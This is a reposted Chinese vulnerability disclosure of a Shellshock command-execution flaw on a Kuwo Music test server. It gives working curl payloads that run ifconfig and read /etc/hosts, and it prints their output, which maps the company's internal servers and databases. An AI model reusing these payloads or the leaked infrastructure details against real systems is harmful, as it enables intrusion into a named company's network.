记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

酷我音乐某站命令执行

2016-01-25 18:55

managetest.kuwo.cn存在bash 命令执行漏洞



curl -A "() { foo;};echo;/sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgi



eth0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38

inet addr:60.28.205.41 Bcast:60.28.205.63 Mask:255.255.255.224

inet6 addr: fe80::21a:a0ff:fe0d:fb38/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1150352590 errors:0 dropped:0 overruns:0 frame:0

TX packets:2511972745 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:228359309665 (212.6 GiB) TX bytes:972996034118 (906.1 GiB)

Interrupt:169 Memory:f4000000-f4011100



eth0:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38

inet addr:60.28.205.48 Bcast:60.28.205.63 Mask:255.255.255.224

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

Interrupt:169 Memory:f4000000-f4011100



eth1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36

inet addr:192.168.0.42 Bcast:192.168.255.255 Mask:255.255.0.0

inet6 addr: fe80::21a:a0ff:fe0d:fb36/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:7819254624 errors:0 dropped:0 overruns:0 frame:0

TX packets:11484217788 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:3514910215382 (3.1 TiB) TX bytes:14712204358111 (13.3 TiB)

Interrupt:169 Memory:f8000000-f8011100



eth1:0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36

inet addr:192.168.0.136 Bcast:192.168.255.255 Mask:255.255.0.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

Interrupt:169 Memory:f8000000-f8011100



eth1:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36

inet addr:192.168.0.139 Bcast:192.168.255.255 Mask:255.255.0.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

Interrupt:169 Memory:f8000000-f8011100



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:111515227 errors:0 dropped:0 overruns:0 frame:0

TX packets:111515227 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:66706130576 (62.1 GiB) TX bytes:66706130576 (62.1 GiB)



lo:0 Link encap:Local Loopback

inet addr:60.28.205.61 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1



lo:1 Link encap:Local Loopback

inet addr:60.28.193.246 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1



lo:2 Link encap:Local Loopback

inet addr:127.0.0.2 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1





漏洞证明:

curl -A "() { foo;};echo;/bin/cat /etc/hosts" http://managetest.kuwo.cn/cgi-bin/test-cgi

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1backup42.com backup42 localhost

127.0.0.1 image.kuwo.cn

#127.0.0.1 star.kuwo.cn

192.168.1.120 s120

192.168.0.80 lyric80

192.168.0.82 lyric82

192.168.0.81 lyric81

192.168.0.88 lyric88

192.168.0.96 lyric96

192.168.0.97 lyric97

60.29.226.181 www.kuwo.cn

60.29.226.181 kzone.kuwo.cn



192.168.0.248 bkserver248

192.168.0.187 bkserver187

192.168.0.179 bkserver179

192.168.0.169 bkserver169

192.168.0.170 bkserver170

192.168.210.240 bkserver240

192.168.0.190 bkserver190

192.168.0.43 bkserver43

192.168.0.174 bkserver174

192.168.0.39 bkserver39

192.168.0.40 bkserver40

192.168.217.183 bkserver183

192.168.0.189 bkserver189

192.168.0.26 bkserver26

#192.168.210.85 bkserver85

192.168.210.71 bkserver85

192.168.0.56 bkserver56

60.28.199.29 bkserver29

60.28.210.125 bkserver125



#60.28.205.61 nplserver.kuwo.cn

#60.28.205.41fang1.koowo.com

#60.28.205.41fang2.koowo.com

#60.28.205.41fang.koowo.com

127.0.0.1 test41.kuwo.cn



127.0.0.1 ksingservice.kuwo.cn



#127.0.0.1star.kuwo.cn

#127.0.0.1mv.koowo.com



#60.28.205.48fang1.koowo.com

#60.28.205.48fang2.koowo.com

#60.28.205.48fang.koowo.com

127.0.0.1fang1.koowo.com

127.0.0.1fang2.koowo.com

127.0.0.1fang.koowo.com

#60.28.205.41 www.kuwo.cn

#221.238.18.39 kzone.kuwo.cn

#60.29.225.24 kzone.kuwo.cn

60.28.205.48kzone48.koowo.com

60.28.205.48kzone48.kuwo.cn

#60.28.205.48star.koowo.com



#the following settings are for koowo web develop

127.0.0.1mainwebserver

192.168.0.174 mainwebserver_T

#web servers

192.168.0.42localwebserver

192.168.0.57otherwebserver1

192.168.0.188otherwebserver2

192.168.0.184 otherwebserver3

192.168.217.171 otherwebserver4

192.168.0.74 otherwebserver5

192.168.201.12 otherwebserver6

192.168.217.185 otherwebserver7



192.168.217.168 ucmwebserver1

192.168.217.173 ucmwebserver2

#backend servers

192.168.0.169lhserver

192.168.0.169scoreserver

192.168.0.169loginserver

192.168.0.169guestserver

192.168.0.169musicstatserver

192.168.0.49 lhbakserver

60.28.205.41profilecacheserver

192.168.0.21profileoscacheserver

192.168.0.21usercacheserver

192.168.0.187newsserver

192.168.0.187 activityserver

192.168.206.247 reslist.kuwo.cn

192.168.0.80 shouji.kuwo.cn

#databases



192.168.0.185 queryservereditor

192.168.0.185 queryserver185

192.168.201.44 queryserver44

192.168.0.185 queryservermlog

192.168.0.186 queryserver186

#192.168.0.42 queryserver186

192.168.0.42 queryserver41

192.168.0.188 queryserver188

192.168.0.185queryserver46

192.168.0.177queryserver177

192.168.210.76vipuserdatabaseserver

192.168.0.169 queryserver43

192.168.201.43 queryserver20143

192.168.0.189 queryserver189

#192.168.217.171 queryserver171

#192.168.210.104 queryserver171

192.168.226.167 queryserver171



60.29.226.168 queryserver190

192.168.217.171 queryserver74

192.168.201.16 queryserver16

192.168.201.17 queryserver17



192.168.10.50 queryserver50

192.168.10.51 queryserver51

192.168.210.125 queryserver87



#221.238.18.45 huangfan.kuwo.cn

60.28.204.156 huangfan.kuwo.cn

60.28.205.38 koowo.com

60.28.205.38 kuwo.cn

60.217.32.231 mail.koowo.cn

60.217.32.233 mail.kuwomail.com

192.168.199.24 queryserver29



192.168.0.42 local.kuwo.cn



#60.29.226.174 search.kuwo.cn

#192.168.0.53 search.kuwo.cn

#192.168.0.53 search.koowo.com



192.168.0.54 search.koowo.com

192.168.210.106 search.kuwo.cn

60.28.205.41 player.kuwo.cn



127.0.0.1 dh.kuwo.cn

60.28.205.57 css.kuwo.cn

#60.28.205.56 tips.kuwo.cn

60.28.205.39 data.search.kuwo.cn

#60.28.205.39 search.kuwo.cn

#192.168.0.53 search.koowo.com

#192.168.0.53 search.kuwo.cn

#60.29.226.174 search.kuwo.cn

#60.29.226.174 search.koowo.com

#192.168.0.146 nplserver.kuwo.cn



60.28.205.39 lyric.koowo.com

60.28.205.39 lyric.kuwo.cn

60.28.205.39 newlyric.koowo.com

60.28.205.39 newlyric.kuwo.cn



60.28.199.29 topmusic.kuwo.cn

60.28.199.24 queryserver24



218.27.132.18 mp3dl.cdn.kuwo.cn



#test env for dj backend

#60.28.193.252 gyhserver1.kuwo.cn

#kuwolive

#60.28.201.38antiserver.kuwo.cn

#192.168.0.181 antiserver.kuwo.cn

#192.168.0.170 antiserver.kuwo.cn



#192.168.206.247 antiserver.kuwo.cn

192.168.195.120 antiserver.kuwo.cn



192.168.217.188 nksingserver.kuwo.cn



#game history

192.168.217.174 gamehistoryserver.kuwo.cn



#60.29.244.181 user.hvsop.cn

60.28.201.5puppet.kuwo.cn

192.168.201.38 updateedit.kuwo.cn

# for zadan test

127.0.0.1 topic.kuwo.cn

127.0.0.1 pc.kuwo.cn

60.28.210.68 mobi.kuwo.cn



192.168.210.76 pay-master.db.kuwo.cn

192.168.226.167 pay-slave.db.kuwo.cn

192.168.201.30 pay-backup.db.kuwo.cn



192.168.210.76 vip-master.db.kuwo.cn

192.168.226.167 vip-slave.db.kuwo.cn

192.168.201.30 vip-backup.db.kuwo.cn

192.168.201.43 vip-test.db.kuwo.cn



192.168.210.74 queryserverdd



#60.28.210.114 zhiboserver.kuwo.cn

#60.28.201.37 x.kuwo.cn

Content-type: text/plain; charset=iso-8859-1

修复方案:

实在不行删了test-cgi


知识来源: www.wooyun.org/bugs/wooyun-2016-0171346

阅读:237567 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“酷我音乐某站命令执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云